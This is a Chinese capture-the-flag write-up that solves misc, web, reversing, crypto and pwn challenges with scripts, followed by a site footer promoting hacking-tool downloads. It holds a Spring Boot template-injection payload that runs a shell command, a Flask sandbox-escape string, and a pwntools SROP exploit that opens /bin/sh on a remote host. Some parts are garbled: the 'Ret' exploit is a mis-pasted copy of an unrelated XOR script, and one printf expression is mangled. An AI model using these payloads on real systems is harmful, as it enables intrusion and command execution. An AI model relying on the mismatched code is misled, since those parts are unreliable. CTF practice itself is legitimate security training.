Misc
信息安全大赛的通知
经典签到题目
Word改颜色看到flag
编码转换
Brainfuck编码,进行解码
拼接下就是flag
coding_analyse
多重解码
凯撒解码
bluetooth
筛选蓝牙9上的UIH数据包
使用tshark导出到123txt
这里能组成压缩包
010保存到本地后解压
将二者进行10-16进制转换,异或得到flag
Web
input_data
御剑扫描到index.php
根据提示进入/.svn
目录下翻找到flag
Admin
打开网站无80web服务,dirsearch扫描
各个界面都访问,发现明显spring boot漏洞
根据文章参考写payload
最终为获取flag
/admin;/?path=__${new java.util.Scanner(T(java.lang.Runtime).getRuntime().exec("cat /flag").getInputStream()).next()}__::.x
Flask
可以被'open(import("os").popen("ls").read())'等绕过
用自动化的 Python 沙箱逃逸脚本
得到payload
REVERSE
ez_apk
使用jadx反编译
定义了checkin方法
获取密钥key,拿到cipher
计算出正确的cipher
cipher = 'f`vgu007fvkXknxfznQv|gz|u007f}c|G~bh{{x|u007fVVFGX'
flag = ''
for i in range(0,len(cipher)):
flag += chr(ord(cipher[i:i+1]) ^ i)
print(flag)
计算出flag
def decode(cipher_text, secret_key):
key_bytes = []
for char in secret_key:
key_bytes.append(ord(char))
decoded_chars = []
for index, encrypted_char in enumerate(cipher_text):
if encrypted_char in ['_', '{', '}']:
decoded_chars.append(encrypted_char)
else:
key_char = key_bytes[index % len(key_bytes)] - 97
cipher_shift = ord(encrypted_char) - 97
decoded_shift = (cipher_shift - key_char) % 26
decoded_char = chr(decoded_shift + 97)
decoded_chars.append(decoded_char)
return ''.join(decoded_chars)
cipher_text = "fatd{**_cgrmvc_ylvhokhuk_gxsgffc_wtec}"
secret_key = 'aptxcony'
decoded_string = decode(cipher_text, secret_key)
print("flag:>", decoded_string)
文件分析
密码长度检查
最后一个字符必须为w
调用 check_password() 函数验证
字符串用pow计算,推理
我们可以使用printf("%d",pow1 ((o-----------o
| !
! !
! !
o-----------o).A,2)+(I---I))
将密文输出,得到密文后进行Z3约束求解
from z3 import *
solver = Solver()
a, b, c, d, e, f, g, h, i, j, k, l = Ints("a b c d e f g h i j k l")
solver.add(a + b == 101) # a + b == 101
solver.add(b + c == 143) # b + c == 143
solver.add(a * c == 5035) # a * c == 5035
solver.add(d + f == 163) # d + f == 163
solver.add(d + e == 226) # d + e == 226
solver.add(e * f == 5814) # e * f == 5814
solver.add(h + i == 205) # h + i == 205
solver.add(g + i == 173) # g + i == 173
solver.add(g * h == 9744) # g * h == 9744
solver.add(j + k * l == 5375) # j + k * l == 5375
solver.add(k + j * l == 4670) # k + j * l == 4670
solver.add(j + k == 205) # j + k == 205
if solver.check() == sat:
model = solver.model()
result = [model[v].as_long() for v in [a, b, c, d, e, f, g, h, i, j, k, l]]
print("".join(chr(x) for x in result))
else:
print("no ans!")
机器猫
我们使用pyinstxtractor反编译转回源代码.pyc
在010查看到加密的base64
使用https://cyberchef.org/解密,类似于凯撒密码
CSMazeee
去壳,用dnspy分析
点击100次可以跳出button1_Click,
每次输入字符会导致 num 发生增减变化,变化的步长是 1;num2 则每次按照步长为 14 进行加减。在处理这些输入字符的过程中,程序会不断计算 mazee[num + num2] 这个索引位置的值。校验规则是:如果 mazee[num + num2] 中的某个中间状态值为 48,则继续校验;当所有输入处理完毕时,mazee[num + num2] 的最终值必须为 49,校验才算通过。
十六进制下能看到0x30, 0x30, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x30, 0x30, 0x30, 0x30, 0x0A, 0x0A, 0x2A, 0x30,
0x30, 0x30, 0x30, 0x30, 0x30, 0x2A, 0x30, 0x2A, 0x2A, 0x30, 0x0A, 0x0A, 0x2A, 0x2A, 0x2A, 0x2A,
0x2A, 0x2A, 0x30, 0x2A, 0x30, 0x2A, 0x2A, 0x30, 0x0A, 0x0A, 0x2A, 0x2A, 0x31, 0x30, 0x30, 0x2A,
0x30, 0x30, 0x30, 0x2A, 0x2A, 0x30, 0x0A, 0x0A, 0x2A, 0x2A, 0x2A, 0x2A, 0x30, 0x2A, 0x2A, 0x2A,
0x2A, 0x2A, 0x2A, 0x30, 0x0A, 0x0A, 0x2A, 0x2A, 0x2A, 0x2A, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30,
0x30, 0x30, 0x0A, 0x0A
num + num2 在中间过程中必须保持在 INDEXES[] 中。
经过所有字符输入后,num + num2 的最终值必须为 44。
其中一个符合条件的路径为:rdrrrrrddrruuurrrdddddllllllluull
CRYPTO
不小心
代码定义了一个字符串s,正则表达检查flag符合DASCTF{}格式,接着转换二进制字符串,补全为8位,将字符按照3字节与6字节分割转换,典型的换表base64类型
将base64字符集输入,将已经编码的字符串C对应到索引,定义exp进行递归,n分割4个为1字符依次递归base64函数解码
以下是exp:
# coding:utf-8
# python 3.6
# import re
s = "fst3Sem8Wgnobcd9+++++uv2JKpUViFGHz0QRMyjkA7NaBC14wXYxh5OP/DEqrZIl6LT"
def encode(inputs):
bin_str = ['{:08b}'.format(ord(i)) for i in inputs]
outputs = ""
nums = 0
while bin_str:
temp_list = bin_str[:3]
if len(temp_list) != 3:
nums = 3 - len(temp_list)
temp_list += ['0' * 8] * nums
temp_str = ''.join(temp_list)
temp_str_list = [int(temp_str[i * 6:(i + 1) * 6], 2) for i in range(4)]
if nums:
temp_str_list = temp_str_list[:4 - nums]
outputs += ''.join(s[i] for i in temp_str_list)
bin_str = bin_str[3:]
outputs += '=' * nums
return outputs
def custom_decode(encoded_string, s, a):
result = ''
for char in encoded_string:
if char in s:
index = s.index(char)
result += a[index]
return result
s = "fst3Sem8Wgnobcd9+++++uv2JKpUViFGHz0QRMyjkA7NaBC14wXYxh5OP/DEqrZIl6LT"
a = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='
b = '+Se++h+mF5u0d++Oc++RbQJYbyuMb++0cYuQc+SwdmK0d+fwcYRYG+'
decoded_string = custom_decode(b, s, a)
print("Decoded to Base64:", decoded_string)
from base64 import b64decode
def base64_recursive_decode(chunk, idx, ss):
if idx >= 4:
try:
decoded_chunk = b64decode(chunk)
except Exception:
return
if all(chr(byte) in ss for byte in decoded_chunk):
print("Decoded chunk:", decoded_chunk)
return
if chunk[idx] == 'Q':
for replacement in "QRSTU":
new_chunk = chunk[:idx] + replacement + chunk[idx + 1:]
base64_recursive_decode(new_chunk, idx + 1, ss)
else:
base64_recursive_decode(chunk, idx + 1, ss)
ss = '0123456789abcdef-_{}'
n = 'QEFQQ1QGezc4YWQhMQEzZQcwOWZkZjEyYQVhYQQhYQVkZDYyZQMzfQ=='
n = n[8:]
for v in range(0, len(n), 4):
print('--------- Decoding block:', v, n[v: v + 4])
base64_recursive_decode(n[v:v + 4], 0, ss)
Base
这就是个套娃
Base100-base64-base85-base91-base62-再用随波逐流工具一键解码
easy_crypto1
找到下一个比 getPrime(16) times p + 38219 更大的素数。
from Crypto.Util.number import isPrime
import gmpy2
n = 1605247600724752598798254639224215706171506359654961357324428027985787942008103766562745464838961569081446916113769517713344420113584254259000172572811154232107339480903672251992191997458469905064423618888336088652352540882576826988355783159237971043770132628344798937353150930071309347972804118952814447576207066147031238749098842662046825743988208813903138796789940911515825517078554074496474819128789835309636804325132602557092847746454786387067599510769382078521691609970320528531270474091713477040343897269903489441410062592732302402854035415438078656688806905350495825334584533345448091335565792091890185673190424063
c = 751639057610677013264061431434189083017589908118307247217007533938435229431015858783222167911772848893015518607229280589985711010766459396989232072512314594917029375221335361209036112742388866873824163350886610514973038316512032459352053158417705406031466332440378871927174731975794579894912999936641163063898365134788537389162378185448090279397717831977803284480743612393591614284972981435749362255654561121758163485884075260156288337176713756471879489767416836868661153693157792733142765671887792303181376620864506386820826866340907593080654521498766421056474652652337037121881207188033108746890998208582406826010121861
for i in range(2 ** 15, 2 ** 16):
if isPrime(i):
candidate_q = next_prime(i * gmpy2.iroot(n // i, 2)[0] + 38219)
if n % candidate_q == 0:
q = candidate_q
print(f"Found q: {q}")
break
p = n // q
phi = (p - 1) * (q - 1)
e = 65537
d = gmpy2.invert(e, phi)
E1 = pow(c, d, n)
print(f"Decrypted message: {E1}")
中国剩余定理解出E2
from functools import reduce
import gmpy2
def chinese_remainder_theorem(moduli, remainders):
total_sum = 0
total_product = reduce(lambda a, b: a * b, moduli)
for modulus, remainder in zip(moduli, remainders):
partial_product = total_product // modulus
total_sum += remainder * (gmpy2.invert(partial_product, modulus) * partial_product)
return total_sum % total_product
moduli_list = [
15863230586500684911356384742123404120213699052018048588650392009927565369685497256344682150189923131009586323640507773706997704860898682946308031020361302334248895233255911348365179153799197341744863134926804603973507415697810440916305092395180382239729550833607847524005391137474497849077097574452115379368463540087172800902210822143687014813631366360652583216269138116785489485772437870528892032119729929607857459621078790511144060710035933887337208301078892163837203412081114510143406013892393607932596921308889058909544584619676380766485493114814753878272881866907210235681877689493671668534251778397658670518117,
14144098469438619358682652828507744381697293556670717685553585719665002440476256008471235313826051740009083510860714991201047915737216102220242621674841600987122005914542061963618272275986835928673920375768272390912778741502655909281390948606467847118377641357547931472588836726339758576038273820470879637555458446243401248151675266602656677360819563744765522495640821496694918515669243614141704744848980746101569785439728585144841655665959389460512628800782742764147773150430552859331269667626942993392101897661719871375721143240270211821269260950380944670195863016621594387236339317938305273510719419578308449465183,
27563822879593503938377821960427219022565215631856333510782568496016547757945464794632272818101891677705256471714805217606503652132995136255720639088424576003650628211271025648183600635145895528466199068640094470078526413324708028578289949241288828542143203769199399500669311878391255837977932634772778594526940501234736059441483897017015324765266787399950699732518347518591167932031031320265136158304460199654008895095274754918153773566824931440342525688741289235153882699461549523425169846266597156773535163599640189457171272058311480951820887261040891344076039474315985825984444520336790670313179493074014037981261
]
remainders_list = [
3833095607830862948079097323254872789586576953317671099752083261949616608759231291050566542764984974722790226120399722937104503590740358249900089784508490830379531632752169777949200718567033018577184658177019404903817920024468923715441355404672443007723525750768430895425376124679225715687382380114628103058312176343693900115638265002657622618744666247132114654135429040069316368839938881716554901593031901272992940200484460436193699175500376368456706998564064693820008778900344357745691652875500810447147088715289581351501876012044611990972521570253106671158207677490849249612002954497927762168699886110455354481924,
1502420121177211156091634258259634977709023894278792755694473756163084431123774101512866316989917922052023168401167212284219907272528117024670443698990238243030221117004372456475521502350404137469088570170885409265567084376069256924135270283335242133163303599239181417949980292944203204296598188175632723968779672994090788585343302473442389865459398142634104331743517384589200789331489394375604801951994831647339839112698394141328178967516636452592385248135340133712522135715943787590172334743893259621909532456281362868290556461907936774231166936915669816509378419892149164552548131776979706381641477878931403040942,
8992204063713908492214256291861339175525948946919629972908439132005643626148678347198381531633907182877152728077958345519083406637446972079387161726967295886447791613166577391233866583354793842121902234644830640050181130381996083089350911224037154798259291124104894554037604500881250119806371348673833105103600782286898276354573884788251542211434143476774391457587885772379990104835187104619922442613860682792470389490804228050671124495925536024571104944112397143299499508504917890140939438891891453283594000764399193028606955089853654071198909973555844004685149713774167524224100487937899126480545681565581673958854
]
e = 89
m_e = chinese_remainder_theorem(moduli_list, remainders_list)
message = gmpy2.iroot(m_e, e)[0]
print(f"Decrypted message: {message}")
n1与n2有共同因子P,直接求最大公约数
print(gmpy2.gcd(E1, phi_1))# 35
同余性质,把m次幂的降最低
我们知道:如果a≡b(mod mn),可以将其拆解为两个同余式:a ≡b(mod m)和a≡b(mod n)。基于此,存在以下推论:c1≡ m°(mod P)和 c ≡ me(mod Q1),以及 c ≡ m°(mod P)和 c ≡ m“”(mod Q2)。通过相乘性质,我们可以得到 c = c·c ≡ me·me(mod P).
然后,我们可以利用中国剩余定理,将这组同余方程结合起来得到唯一解:c=me(mod Q),c2三m,e2(mod Qz),cs=me·me(mod P)。
from Crypto.Util.number import long_to_bytes
import gmpy2
from functools import reduce
def solve_crt(moduli, remainders):
total = 0
N = reduce(lambda a, b: a * b, moduli)
for modulus, remainder in zip(moduli, remainders):
Ni = N // modulus
total += remainder * gmpy2.invert(Ni, modulus) * Ni
return total % N
n1 = 21655617838358037895534605162358784326495251462447218485102155997156394132443891540203860915433559917314267455046844360743623050975083617915806922096697304603878134295964650430393375225792781804726292460923708890722827436552209016368047420993613497196059326374616217655625810171080545267058266278112647715784756433895809757917070401895613168910166812566545593405362953487807840539425383123369842741821260523005208479361484891762714749721683834754601596796707669718084343845276793153649005628590896279281956588607062999398889314240295073524688108299345609307659091936270255367762936542565961639163236594456862919813549
n2 = 24623016338698579967431781680200075706241014384066250660360949684385831604822817314457973559632215801205780786144608311361063622813017396858888436529116737754653067203843306015767091585697803364656624926853551997229897087731298797904208292585562517602132663331748784390752958757661484560335406769204491939879324079089140420467301773366050084810282369044622442784113688062220370531522036512803461607049619641336524486507388232280683726065679295742456158606213294533956580462863488082028563360006966912264908424680686577344549034033470952036766850596897062924137344079889301948258438680545785139118107899367307031396309
c1 = 2615722342860373905833491925692465899705229373785773622118746270300793647098821993550686581418882518204094299812033719020077509270290007615866572202192731169538843513634106977827187688709725198643481375562114294032637211892276591506759075653224150064709644522873824736707734614347484224826380423111005274801291329132431269949575630918992520949095837680436317128676927389692790957195674310219740918585437793016218702207192925330821165126647260859644876583452851011163136097317885847756944279214149072452930036614703451352331567857453770020626414948005358547089607480508274005888648569717750523094342973767148059329557
c2 = 6769301750070285366235237940904276375318319174100507184855293529277737253672792851212185236735819718282816927603167670154115730023644681563602020732801002035524276894497009910595468459369997765552682404281557968383413458466181053253824257764740656801662020120125474240770889092605770532420770257017137747744565202144183642972714927894809373657977142884508230107940618969817885214454558667008383628769508472963039551067432579488899853537410634175220583489733111861415444811663313479382343954977022383996370428051605169520337142916079300674356082855978456798812661535740008277913769809112114364617214398154457094899399
E1 = 377312346502536339265
E2 = 561236991551738188085
P = gmpy2.gcd(n1, n2)
Q1 = n1 // P
Q2 = n2 // P
exp1 = gmpy2.invert(E1 // 35, (P - 1) * (Q1 - 1))
exp2 = gmpy2.invert(E2 // 35, (P - 1) * (Q2 - 1))
dec_c1 = pow(c1, exp1, n1)
dec_c2 = pow(c2, exp2, n2)
c3 = dec_c1 * dec_c2 % P
mod_c1 = dec_c1 % Q1
mod_c2 = dec_c2 % Q2
combined_result = solve_crt([mod_c1, mod_c2, c3], [Q1, Q2, P])
phi = (Q1 - 1) * (Q2 - 1)
n = Q1 * Q2
c_m = combined_result % n
e = 35
d = gmpy2.invert(7, phi)
m = pow(c_m, d, n)
print(long_to_bytes(gmpy2.iroot(m, 5)[0]))
just math
低加密指数e=3,rsa的加密公式c = m的e次方 mod n,c < n^(1/3), 通过直接计算密文的整数立方根来恢复原始消息 m
Exp
from Crypto.Util.number import *
import gmpy2
ciphertext = 1924635889210773924711378522965854207843051472146513194916783167061162458090637355250481272581703873478440579298520036474045171065792195995974658228386969780210579430878151292611702887188041669069264460156268170885354178469389132838450834398493018168203742426193822379309445968101310981520048027589913953414945962743334769252188573436970839413914815373095974184931183788899690779478585666855429821591221553873937831095720715148525794252576976891489499479497861512
modulus = 2260375559104345425590426977960386256287009777233277062625487017885931446911942921201492850167115455071935831283269948569220356763988762825230315520633702443866690239945242948370781975714325308306543337600783340792458991506685843729962897796956171467876531084194426101796617903015810156717396227079274786269217370618477266867389155551378798713259843750289765858717627925689021561352438080039804957145513478767641674644346609224034274906228784593435462413278410143
for offset in range(2 ** 21):
candidate = ciphertext + offset * modulus
root, exact = gmpy2.iroot(candidate, 3)
if exact:
print(long_to_bytes(root))
PWN
ASM
这里输出完之后会直接接收一串字符串
然后跳转进来,可以看到能接收的字符串是远远多于它所分配的空间,可以利用栈溢出的漏洞
然后可以直接看到这里有/bin/sh的地址 然后就是简单构造一个rop,然后利用栈溢出跳转到构造的rop上执行 Exp
from pwn import *
from LibcSearcher import *
def send_data(data):
p.send(data)
def send_after(prompt, data):
p.sendafter(prompt, data)
def send_line(data):
p.sendline(data)
def send_line_after(prompt, data):
p.sendlineafter(prompt, data)
def receive_data():
return p.recv()
def print_receive():
print(p.recv())
def receive_until(delimiter):
return p.recvuntil(delimiter)
def interactive_mode():
p.interactive()
def debug_mode():
gdb.attach(p)
def get_leak_address():
return u64(p.recvuntil(b'x7f')[-6:].ljust(8, b'x00'))
context(os='linux', arch='amd64', log_level='debug')
p = remote('101.200.58.4', 10001)
elf = ELF('./pwn')
sig_frame = SigreturnFrame()
sig_frame.rax = 59
sig_frame.rdi = 0x40200A
sig_frame.rsi = 0x0
sig_frame.rdx = 0x0
sig_frame.rip = 0x40102D
payload = (
p64(0x40103D) + p64(0x401034) + p64(0x401030) +
p64(0x401034) + p64(0x401030) + p64(0x401034) +
p64(0x401030) + p64(0x401034) + p64(0x40102D) +
flat(sig_frame)
)
p.sendline(payload)
p.interactive()
Ret
checksec查看保护发现是amd64位系统,几乎什么保护都没有开,将程序拖入ida
发现在output函数中存在一个格式化字符串漏洞
在input函数中当随机数大于等于0x90时会刚好可以覆盖rbp和ret地址,并且read读取的长度取决于 seed,而seed是存储在栈上的,那么只要控制rbp的值并且把程序劫持到input函数中的read函数即可 实现一个非常长的栈溢出,而想要控制rbp的值则需要泄露栈的地址,前面的格式化字符串漏洞就刚好 可以泄露栈地址,后面就是利用栈溢出,使用puts函数泄露出libc基地址,然后将puts函数的got表改为system函数,但 是在使用puts函数泄露libc地址之后rdx会置0,后面使用read修改got表使需要让rdx不为0,所以在中 间执行一个srand函数使rdx有值,修改puts函数的got表并写入/bin/sh字符串即可执行 system("/bin/sh")拿到shell
Exp
cipher = 'f`vgu007fvkXknxfznQv|gz|u007f}c|G~bh{{x|u007fVVFGX'
flag = ''
for i in range(0,len(cipher)):
flag += chr(ord(cipher[i:i+1]) ^ i)
print(flag)
0推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……
还没有评论,来说两句吧...